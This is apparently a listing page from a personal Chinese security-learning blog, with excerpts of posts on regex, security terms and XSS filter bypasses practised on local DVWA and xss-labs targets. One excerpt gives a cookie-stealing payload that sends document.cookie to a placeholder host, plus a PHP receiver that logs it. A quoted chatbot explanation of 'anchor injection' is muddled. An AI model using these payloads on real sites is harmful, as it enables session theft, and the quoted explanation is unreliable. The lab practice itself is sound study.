avatar
文章
68
标签
27
分类
54

首页
归档
标签
分类
Enderman_1's blog
搜索
首页
归档
标签
分类

Enderman_1's blog

正则表达式初学
发表于2023-05-08|小寄巧正则表达式初学
正则表达式初学正则表达式在线测试工具:https://regex101.com/ 常用限定符? 前面的字符出现0次或1次 * 前面的字符出现包括0次的任意次 + 前面的字符出现一次以上 { } 精确匹配 例: {6}:前面的字符出现6次 {3,6}: 前面的字符出现3到6次 {3,}: 前面的字符出现3次以上 原子组我的理解是配合限定符修饰使用。 原子即不可分割,限定符的限定作用对对应的一个原子组生效。 如 (ab){3,6} 这里原子组为(a,b),限定符为{3,6} 匹配连续出现一次及以上的“ab” 如:ab、ababab、ababab……. 常见原子组:一、用括号括起来的部分 (ab) (cat|dog) 表示匹配cat或者dog 注:a(cat|dog){3}这里的限定符{3}只对(cat|dog)作限制。 …诸如此类 二、用方括号括起来的部分方括号括起来的部分表示字符的范围 [abc] :要求匹配的字符只能取自于a、b、c其中任意一个 [a-z]:表示匹配小写字母(从a到z) [a-zA-Z1-9]:表示匹配大小写字母和数字 在方括号 ...
安全术语
发表于2023-04-22|网安基础安全基础知识
安全术语 漏洞利用术语POC POC(Proof of Concept):概念验证,用于验证安全漏洞是否存在,能否被利用。 EXP EXP(Exploit):漏洞利用,代表一段有漏洞利用价值的攻击代码或一个漏洞利用过程 Payload Payload:攻击载荷,通常是指Exploit拿下目标之后,攻击者在目标机器上执行的定制代码或程序,包括执行系统命令、建立会话。 安全漏洞生命周期三个阶段: 漏洞被发现 漏洞信息被公布 漏洞具有官方补丁或修复方案 伴生出的概念: 0day,漏洞信息未公布时,此时利用EXP可以通杀。 1day,漏洞信息被公布,但漏洞没有官方的补丁或修复方案,此时利用EXP可以入侵大部分系统。 Nday,漏洞已经有补丁,此时利用EXP只能入侵还未及时修复的系统 CVE/CNVD CVE(Common Vulnerabilities & Exposures): 通用漏洞披露,相当于全球漏洞的百科全书。 CNVD全称 国家信息安全漏洞共享平台,是一个国家网络安全漏洞库。收录的各类漏洞会被赋予CNVD编号。 Shell/Webshell ...
关于锚点注入的深入探讨
发表于2023-04-21|网安基础XSS跨站脚本攻击
关于锚点注入的深入探讨问题描述dvwa靶场 high难度下的 dom型XSS关卡的解法很有意思 这关使用了锚点注入的方式,通过在URL后面添加#和script标签,就能使浏览器执行脚本 以下是chatGPT对锚点注入的解释: 锚点注入: 在URL的井号后面添加JavaScript脚本是一种称为“锚点注入”的技术,它可以实现在页面加载时执行JavaScript代码。但是,这种技术并不是所有浏览器都支持,而且也存在一些安全风险。 如果浏览器支持锚点注入,那么在URL的井号后面添加JavaScript脚本是可以运行的。例如,以下URL会在页面加载时弹出一个警告框: 1http://example.com/page.html#<script>alert('Hello, world!');</script> 但是,为了保证网站的安全性,大多数现代浏览器已经禁止了锚点注入这种技术。因此,不建议在URL中使用锚点注入来执行JavaScript代码,而应该使用更安全的方法,如在HTML文档中嵌入JavaScript代码或在外部JavaScript文件 ...
实用姿势总结
发表于2023-04-20|网安基础XSS跨站脚本攻击
XSS实用绕过姿势总结1. 嵌套字符以应对字符删除型过滤如:xss-labs-master level7 此处直接删除了字符script和href 可以采用嵌套的方式绕过 hhrefref sscriptcript 此时,只会删除掉特定的连续字符串,但是剩下的字符又会重新组合成这个字符串,达成绕过的目的。 2. 尝试使用锚点注入的方式绕过(不一定会成功) 锚点注入: 在URL的井号后面添加JavaScript脚本是一种称为“锚点注入”的技术,它可以实现在页面加载时执行JavaScript代码。但是,这种技术并不是所有浏览器都支持,而且也存在一些安全风险。 如果浏览器支持锚点注入,那么在URL的井号后面添加JavaScript脚本是可以运行的。例如,以下URL会在页面加载时弹出一个警告框: 1http://example.com/page.html#<script>alert('Hello, world!');</script> 但是,为了保证网站的安全性,大多数现代浏览器已经禁止了锚点注入这种技术。因此,不建议在URL中 ...
XSS的绕过姿势(四)
发表于2023-04-20|网安基础XSS跨站脚本攻击
XSS的绕过姿势(四)本章重点挑xss-labs-master靶场里一些经典的例子探讨 level2 闭合文本框 查看网页源码: 12345<h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相关的结果.</h2><form action=level2.php method=GET><input name=keyword value="<script>alert(1)</script>"><input type=submit name=submit value="搜索"/></form> 看的出来 回显的消息被转义了,但是搜索框里的内容还在,看来搜索框是有value属性的 换思路 提前闭合value属性 成功 level5 闭合文本框这一关把on开头的字符串全部替换成了 on_ 开头,script标签也替换成了scr_ipt标签 尝试大小写绕 ...
XSS的绕过姿势(三)
发表于2023-04-16|网安基础XSS跨站脚本攻击
XSS的绕过姿势(三)本章提及的几种姿势将在dvwa靶场进行演示 存储型XSS的绕过姿势 URL: 1http://localhost:8081/dvwa/vulnerabilities/xss_s/ 安全等级:Medium猜测与尝试存储型,注意到有两个文本框,一个是姓名,一个是评论消息。 可能只对评论信息做了过滤,名字通过前端限制了输入字长,但没做过滤。 尝试修改名字的限制长度,然后在名字的文本框发脚本。 改成100,然后痛快地写脚本 失败: 推测可能对script标签做了过滤,老套路,换img 成功 尝试以下在评论消息框发同样的脚本 失败 message直接没了……可能是过滤掉了尖括号 查看源码123456789101112131415161718192021222324<?phpif( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] );//返回去掉两边空格的字符串 $ ...
XSS的绕过姿势(二)
发表于2023-04-16|网安基础XSS跨站脚本攻击
XSS的绕过姿势(二)本章提及的几种姿势将在dvwa靶场进行演示 文本框反射型XSS的绕过姿势安全的等级:Medium URL: 1http://localhost:8081/dvwa/vulnerabilities/xss_r/?name=XXX# 猜测与尝试肯定有过滤,但不知道过滤了什么 先简单试试 1http://localhost:8081/dvwa/vulnerabilities/xss_r/?name=<script>alert(1)</script># 回显的script标签消失了,可能是被过滤掉了。 猜测是黑名单过滤,先试试大小写绕过: 1http://localhost:8081/dvwa/vulnerabilities/xss_r/?name=<sCript>alert(1)</script># 成功 推测是简单过滤掉了script标签。 php源码: 123456789101112131415<?phpheader ("X-XSS-Protection: 0");// Is the ...
XSS的绕过姿势(一)
发表于2023-04-13|网安基础XSS跨站脚本攻击
xss的绕过姿势(一)本章提及的几种姿势将在dvwa靶场进行演示 下拉列表DOM型XSS的绕过姿势安全等级:Medium URL: 1http://localhost:8081/dvwa/vulnerabilities/xss_d/?default=English 猜测与尝试注意到有下拉列表,且在URL中修改default=后面的值时能回显至页面的下拉列表中 例: 1http://localhost:8081/dvwa/vulnerabilities/xss_d/?default=xxxxxxxx 尝试提交payload 提交后发现default后面的值又变回English了 猜测是做了过滤,检测到尖括号或者关键词就替换回 English 查看源代码 1234567891011121314<?php// Is there any input?if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) { ...
XSS盗取cookie
发表于2023-04-13|网安基础XSS盗取cookie
xss盗取cookiecookie概念 cookie是在http协议下,由web服务器保存在用户客户端上的小文本文件,常包含有关用户的信息 盗取cookie关键代码1document.location='http://ip/cookie.php?cookie='+document.cookie cookie.php代码: 1234<?php$cookie=$_GET['cookie'];file_put_contents('cookie.txt',$cookie);?> 但是……在实操时遇到了点问题我在WWW根目录下新建了个文件夹cookieCatch,在里面写了一个cookie.php,新建了个cookie.txt放弹回来的cookie。 然而,我在url上添加这串payload并回车时,什么事也没有发生……(在dvwa靶场进行测试,已确定安全等级为low,没做过滤) 在文本框输入这串payload时,确实重定向到我写的php页面了。 但是打开cookie.txt只看到这些。。。。 啊? 我觉得可 ...
数据链路层
发表于2023-04-11|计算机网络数据链路层
第三章 数据链路层 本章主要内容 点对点信道和广播信道的特点,以及对应协议(ppp)(CSMA/CD)的特点 三个基本问题:封装成帧、透明传输、差错检测 以太网mac层的硬件地址 适配器、转发器、集线器、网桥、以太网交换机的作用以及使用场合。 3.1 数据链路层的几个共同问题链路: 从一个节点到相邻结点的一段物理线路,中间无其他交换结点。 数据链路: 物理线路以及实现一些必要的通信协议的硬件和软件 1. 封装成帧给一段数据前后分别加上首部和尾部,便于接收端从比特流中辨认帧的开始和结束位置 2. 透明传输无论什么样的比特组合的数据,都能按照原样没有差错地通过数据链路层 也就是说:如果数据中出现了和帧界定符一样的比特组合时,就要采取有效的措施来解决这个问题。 3. 差错检测传输过程会出现差错(比特差错)难以避免。若判定有差错,那就简单地丢弃这个帧。 3.2 点对点协议PPP点对点协议: PPP (Point-to-Point Protocol) ppp协议的特点 互联网用户只有连接某个ISP才能接入互联网。PPP协议就是用户计算机和ISP进行通信时所使用的 数据链路层 协议 ...
1…567
avatar
Enderman_1
A fictional character not yet born...
文章
68
标签
27
分类
54
Follow Me
公告
尚处于摸爬带滚阶段
最新文章
利用pearcmd实现裸文件包含2024-05-11
CTFshow easy_include2024-05-11
CTFshow web1(困难题)2024-05-08
信息的表示和处理——信息存储2024-05-07
ctf_web2024-05-06
分类
  • CTF7
    • web5
    • 隐写2
  • Linux编程1
    • 多进程编程1
  • c#1
    • c语言错误集1
  • 免杀技术5
标签
脚本,linux,系统管理 图片马 计算机底层 windows web 文件包含 隐写 tmux linpeas c# webpack sql bilLu 免杀技术 Vue 计算机网络 Linux 提权 编译 网安基础 正则 密码学 meterpreter 打靶 Python vim 内核漏洞提权
归档
  • 五月 20245
  • 一月 20243
  • 十二月 20236
  • 十一月 202323
  • 十月 20231
  • 九月 20231
  • 七月 20235
  • 六月 20236
网站资讯
文章数目 :
68
已运行时间 :
本站访客数 :
本站总访问量 :
最后更新时间 :
©2020 - 2024 By Enderman_1
框架 Hexo|主题 Butterfly
搜索
数据库加载中